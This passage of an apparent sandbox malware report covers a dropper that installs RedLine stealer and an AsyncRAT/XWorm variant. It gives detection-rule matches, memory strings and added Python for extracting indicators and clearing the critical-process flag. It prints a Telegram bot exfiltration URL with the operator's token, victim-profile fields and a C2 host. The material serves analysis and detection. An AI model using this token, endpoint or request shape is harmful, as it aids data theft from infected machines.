                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/0
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                            Source: powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 0000000A.00000002.1739488463.000002173EEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E7EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb
                            Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.dr | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                            Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.dr | String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                            Source: YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                            Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, YsrQekGS.exe.0.dr | String found in binary or memory: https://api.telegram.org/bot
                            Source: YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=66784
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 0000000A.00000002.1768144280.00000217574C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5
                            Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.dr | String found in binary or memory: https://ipinfo.io/ip%appdata%
                            Source: powershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr | String found in binary or memory: https://www.ecosia.org/newtab/
                            Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
                            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
                            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
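The two request shapes recorded in this section, the XWorm "new client" notification sent through the Telegram Bot API and the RedLine SOAP calls (CheckConnect, EnvironmentSettings, SetEnvironment, GetUpdates, VerifyUpdate) to pst-child.gl.at.ply.gg:9336, can be turned into indicators mechanically. The Python below is an added example written for this report; it is neither Joe Sandbox code nor code from either malware family. Its input is a constructed copy of three request lines from above with their header line breaks restored, plus one benign request; the 100,000-byte upload threshold and the field names in the returned records are the example's own choices. Two points worth keeping in mind when you reuse it: the token in the `/bot<digits>:<token>/sendMessage` path is the operator's credential and that path pattern, not the api.telegram.org hostname alone, is what to alert on, since Telegram is widely used legitimately; and ply.gg hostnames are handed out by the playit.gg tunnelling service, so the 147.185.221.20 address seen above is a tunnel edge rather than the operator's own server.

```python
"""Classify the HTTP requests captured in this report (added example, not Joe Sandbox code)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: three request heads copied from the report, plus one benign request.
REQUESTS = [
    "GET /bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage"
    "?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet"
    "%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName"
    "%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error"
    "%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6"
    " HTTP/1.1\r\nHost: api.telegram.org\r\nConnection: Keep-Alive",
    'POST / HTTP/1.1\r\nContent-Type: text/xml; charset=utf-8\r\n'
    'SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"\r\n'
    "Host: pst-child.gl.at.ply.gg:9336\r\nContent-Length: 137\r\nExpect: 100-continue",
    'POST / HTTP/1.1\r\nContent-Type: text/xml; charset=utf-8\r\n'
    'SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"\r\n'
    "Host: pst-child.gl.at.ply.gg:9336\r\nContent-Length: 856137\r\nExpect: 100-continue",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com",
]

# Telegram Bot API path: /bot<numeric id>:<secret>/<method>; the whole token is the credential.
TELEGRAM_BOT_PATH = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)")
# Operation names seen in the SOAPAction headers and memory strings of this report.
REDLINE_OPERATIONS = {"CheckConnect", "EnvironmentSettings", "SetEnvironment",
                      "GetUpdates", "VerifyUpdate"}
# Example's own assumption: a SOAP body at least this large is flagged as a candidate upload.
UPLOAD_THRESHOLD = 100_000


def parse_request(raw):
    """Split a raw HTTP request head into (method, target, headers); header names lower-cased."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def parse_xworm_notify(text):
    """Extract the bare hex client ID and the 'Key : Value' fields from the notification text."""
    lines = [line.strip() for line in text.splitlines()]
    fields = {}
    for line in lines:
        key, sep, value = line.partition(" : ")
        if sep:
            fields[key] = value.strip()
    client_id = next((line for line in lines if re.fullmatch(r"[0-9A-F]{16,}", line)), None)
    version = re.search(r"\[XWorm (V[\d.]+)\]", text)
    return client_id, version.group(1) if version else None, fields


def classify(raw):
    """Return an indicator record for a request matching one of the two families, else None."""
    method, target, headers = parse_request(raw)
    host = headers.get("host", "")
    if host == "api.telegram.org":
        match = TELEGRAM_BOT_PATH.match(target)
        if match:
            query = parse_qs(urlsplit(target).query)
            client_id, version, fields = parse_xworm_notify(query.get("text", [""])[0])
            return {
                "family": "XWorm (Telegram notification)",
                "version": version,
                "bot_token": match["token"],
                "api_method": match["method"],
                "chat_id": query.get("chat_id", [""])[0],
                "client_id": client_id,
                "victim": fields,
            }
    action = headers.get("soapaction", "").strip('"')
    if method == "POST" and action.startswith("http://tempuri.org/Endpoint/"):
        operation = action.rsplit("/", 1)[1]
        if operation in REDLINE_OPERATIONS:
            length = int(headers.get("content-length", "0"))
            return {
                "family": "RedLine (SOAP C2)",
                "c2": host,
                "operation": operation,
                "content_length": length,
                "candidate_upload": length >= UPLOAD_THRESHOLD,
            }
    return None


def extract_iocs(requests):
    """Classify every request head and return the matching records in order."""
    return [record for record in (classify(raw) for raw in requests) if record]


if __name__ == "__main__":
    for record in extract_iocs(REQUESTS):
        print(record)
```

The Telegram branch deliberately keys on the path shape rather than on the known token, so a rebuilt sample with a fresh bot still matches; the RedLine branch keys on the tempuri.org SOAPAction namespace and the operation name, which survive a change of C2 host.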

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            Source: YsrQekGS.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Window created: window name: CLIPBRDWNDCLASS

                            Operating System Destruction

                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Process information set: 01 00 00 00
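The entry above is the sandbox recording a 4-byte value of 1 being written as process information on YsrQekGS.exe. That is the shape of a ProcessBreakOnTermination enable (the "critical process" flag): once it is set, terminating the process triggers a CRITICAL_PROCESS_DIED bugcheck, so a responder should check the flag before killing the process and clear it first. The Python below is an added example for this report, not Joe Sandbox or malware code. It decodes the logged bytes on any platform and, on Windows, queries or clears the flag on live PIDs through NtQueryInformationProcess and NtSetInformationProcess (information class 29) via ctypes; clearing requires SeDebugPrivilege, so run it elevated. Reading the logged call as ProcessBreakOnTermination is an interpretation of the evidence shown here, and the command-line PID list in the usage is assumed.

```python
"""Inspect and clear the BreakOnTermination ("critical process") flag (added example)."""
import struct
import sys

PROCESS_BREAK_ON_TERMINATION = 29   # PROCESSINFOCLASS value
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_SET_INFORMATION = 0x0200


def decode_process_information(blob):
    """Interpret the 4 bytes the sandbox logged as the little-endian ULONG handed to the kernel."""
    if len(blob) != 4:
        raise ValueError("ProcessBreakOnTermination takes a 4-byte ULONG")
    return struct.unpack("<I", blob)[0]


def break_on_termination_requested(hex_bytes):
    """True when a logged value such as '01 00 00 00' enables the flag (any non-zero value does)."""
    return decode_process_information(bytes.fromhex(hex_bytes)) != 0


def _bind_windows_apis():
    """Bind the Win32/NT calls used below with explicit signatures; Windows only."""
    if sys.platform != "win32":
        raise OSError("NtQueryInformationProcess is only available on Windows")
    import ctypes
    from ctypes import wintypes

    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    ntdll = ctypes.WinDLL("ntdll")
    kernel32.OpenProcess.restype = wintypes.HANDLE
    kernel32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
    kernel32.CloseHandle.argtypes = [wintypes.HANDLE]
    ntdll.NtQueryInformationProcess.restype = ctypes.c_long   # NTSTATUS
    ntdll.NtQueryInformationProcess.argtypes = [
        wintypes.HANDLE, ctypes.c_int, ctypes.POINTER(wintypes.ULONG),
        wintypes.ULONG, ctypes.POINTER(wintypes.ULONG)]
    ntdll.NtSetInformationProcess.restype = ctypes.c_long
    ntdll.NtSetInformationProcess.argtypes = [
        wintypes.HANDLE, ctypes.c_int, ctypes.POINTER(wintypes.ULONG), wintypes.ULONG]
    return ctypes, wintypes, kernel32, ntdll


def is_critical_process(pid):
    """Query the flag on a live process; raises OSError if it cannot be opened or queried."""
    ctypes, wintypes, kernel32, ntdll = _bind_windows_apis()
    handle = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        flag, returned = wintypes.ULONG(0), wintypes.ULONG(0)
        status = ntdll.NtQueryInformationProcess(
            handle, PROCESS_BREAK_ON_TERMINATION, ctypes.byref(flag),
            ctypes.sizeof(flag), ctypes.byref(returned))
        if status != 0:
            raise OSError(f"NtQueryInformationProcess: NTSTATUS 0x{status & 0xFFFFFFFF:08X}")
        return flag.value != 0
    finally:
        kernel32.CloseHandle(handle)


def clear_critical_flag(pid):
    """Clear the flag so the process can be terminated without a CRITICAL_PROCESS_DIED bugcheck."""
    ctypes, wintypes, kernel32, ntdll = _bind_windows_apis()
    handle = kernel32.OpenProcess(PROCESS_SET_INFORMATION, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        value = wintypes.ULONG(0)
        status = ntdll.NtSetInformationProcess(
            handle, PROCESS_BREAK_ON_TERMINATION, ctypes.byref(value), ctypes.sizeof(value))
        if status != 0:   # 0xC0000061 STATUS_PRIVILEGE_NOT_HELD without SeDebugPrivilege
            raise OSError(f"NtSetInformationProcess: NTSTATUS 0x{status & 0xFFFFFFFF:08X}")
    finally:
        kernel32.CloseHandle(handle)


def find_critical_processes(pids):
    """Return the PIDs whose flag is set; PIDs that cannot be opened or queried are skipped."""
    flagged = []
    for pid in pids:
        try:
            if is_critical_process(pid):
                flagged.append(pid)
        except OSError:
            pass
    return flagged


if __name__ == "__main__":
    print("logged value enables the flag:", break_on_termination_requested("01 00 00 00"))
    # Assumed usage: PIDs taken from a process listing are passed on the command line.
    pids = [int(p) for p in sys.argv[1:]]
    if pids:
        print("critical processes:", find_critical_processes(pids))
```

A sweep over every PID from a process listing is the practical use: anything flagged that is not a known system process (csrss.exe, wininit.exe, smss.exe and similar are critical by design) deserves a look, and for a confirmed malicious one the order is clear the flag, then terminate.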

                            System Summary

                            Source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED | Matched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: 0_2_00406894: __EH_prolog,_wcslen,_wcscpy,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,_wcscpy,_wcscpy,_wcscpy,_wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe 3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: String function: 0041F84C appears 37 times
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: String function: 0041A250 appears 37 times
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: String function: 0041A860 appears 47 times
Source: Ekpb7jn7mf.exe, 00000000.00000003.1668539137.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCALC.EXEj% vs Ekpb7jn7mf.exe
Source: Ekpb7jn7mf.exe, 00000000.00000002.1670344761.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCALC.EXEj% vs Ekpb7jn7mf.exe
Source: Ekpb7jn7mf.exe, 00000000.00000003.1667476911.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCALC.EXEj% vs Ekpb7jn7mf.exe
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameretest.exe4 vs Ekpb7jn7mf.exe
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameImplosions.exe4 vs Ekpb7jn7mf.exe
Source: Ekpb7jn7mf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
